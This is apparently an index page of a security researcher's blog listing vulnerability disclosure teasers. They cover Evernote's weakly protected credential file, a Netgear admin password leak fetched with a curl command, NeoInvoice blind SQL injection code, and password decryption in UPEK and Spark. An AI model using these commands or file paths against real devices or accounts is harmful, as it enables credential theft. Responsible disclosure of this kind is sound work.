Adam Caudill

Security Engineer, Researcher, & Developer

  • Evernote: XOR & Passwords

    Update: Evernote has reported that this issue has been addressed. Evernote for Android stores various settings in an XML, this file though isn’t really protected – it’s easily readable, especially if an attacker is able to get physical access to a device, what’s worse is that it contains the user’s credentials. /data/data/com.evernote/shared_prefs/com.evernote_preferences.xml The username in located in the <string name="username"> element, and the password is stored in <string name="encrypted_password"> – from the name you’d assume that the password is actually encrypted.

    Read more…

  • Revisiting Snapchat API & Security

    As Shapchat has increased in popularity, I’ve been asked several times to revisit my Snapchat API & Security post, to address the changes that they made in response to my complaints. So, here is it – sorta. I started making detailed notes and looking at the changes they made – but yesterday @tlack made that mostly irrelevant with his release of Snaphax, a PHP library to interact with the undocumented Shapchat API.

    Read more…

  • Netgear Admin Password Disclosure

    Some (though not all) Netgear products expose the administrator password to unauthorized users in a file named /cgi-bin/<model>.log – if the device is vulnerable, you’ll get something like this: curl http://<ip>/cgi-bin/WNR2000XT.log Admin login name admin Admin password <snip> Country Europe Wireless network name (SSID) wireless_ext Wireless channel 6 Security type WPA2-PSK(AES) Wireless passphrase <snip> The full list of devices that are vulnerable isn’t known; the issue was presented to Netgear, but no response was received.

    Read more…

  • UPEK Windows Password Decryption

    On August 28th ElcomSoft announced that they had determined a method to extract Windows passwords from the registry for users of UPEK’s fingerprint readers and Protector Suite software (UPEK is now owned by AuthenTec, which is now owned by Apple). What they didn’t announce was the technical details of how they did it. Myself and Brandon Wilson have been working to recreate their research – and we have. We have not been in contact with ElcomSoft, so this is an independent re-discovery of this vulnerability.

    Read more…

  • NeoInvoice Blind SQL Injection (CVE-2012-3477)

    NeoInvoice is a multi-tenant open source invoicing system, that currently contains an unauthenticated blind SQL injection condition in signup_check.php. The input for the value field isn’t being properly sanitized, and is used in string concatenation to create the SQL query: <?php require_once("config.php"); if (isset($_GET['field']) && ($_GET['field'] == 'username' || $_GET['field'] == 'email')) { $field = $_GET['field']; $table = 'user'; $taken = '0'; $not_taken = '1'; } else if (isset($_GET['field']) && $_GET['field'] == 'coupon') { $field = 'name'; $table = 'coupon'; $taken = '1'; $not_taken = '0'; } else { die("

    Read more…

  • Decrypting Spark Saved Passwords

    A friend of mine has been evaluating an open source instant messaging client called Spark, which can be linked to Active Directory for authentication. Like most IM clients, Spark allows users to save their password – and me being me, I was curious as to how it’s doing this – as storing Windows domain logins is kinda a big deal. So, within a few minutes I found all of the details – and none of them make me feel any better.

    Read more…

  • Snapchat: API & Security

    Update 3: In 2014 the FTC filed a complaint against Snapchat for their failure to provide the level of security they promised. The findings listed below were sent to the founders of Snapchat, that email was quoted in the FTC compliant as proof that Snapchat was aware of these issues. Update 2: The Snapchat API has changed to address the issues I pointed out to them – and the new API has issues as well.

    Read more…

  • Slipping Past LastPass

    Update: LastPass has confirmed that they’ll address this issue in the next release. Update 2: LastPass has addressed this issue in their new v2.0 release. There is still a way to bypass the password prompt in Chrome, but they will address that in the next release. Overall, it looks like we can close the books on this one. I’m a big fan of LastPass – it’s a great service that has impressed me every step of the way.

    Read more…

  • Poking Mykonos

    While checking on the latest updates in the start-up world from TechCrunch, I came across their article on Mykonos; the important part of their article (at least for me), is this: Mykonos’s Web Security product uses deception to “detect, confuse, slow down and prevent attackers” in real-time in order to help companies protect their websites and Web apps from malicious hacker and proactively prevent fraud and theft. A couple of minutes of reading, and my interest was piqued – to say the least.

    Read more…

  • Google Chrome Leaking Credit Card Data?

    While testing ccsrch I noticed a number that looked familiar – my debit card number. Now, being just a little paranoid, I don’t leave such information on my system unencrypted – so seeing it was a real surprise. But, here’s the real kicker: it was on my work PC, where it never should have been. But there it was, plain as day, in clear text. I spent a couple of minutes staring at the log trying to figure out why it would be there.

    Read more…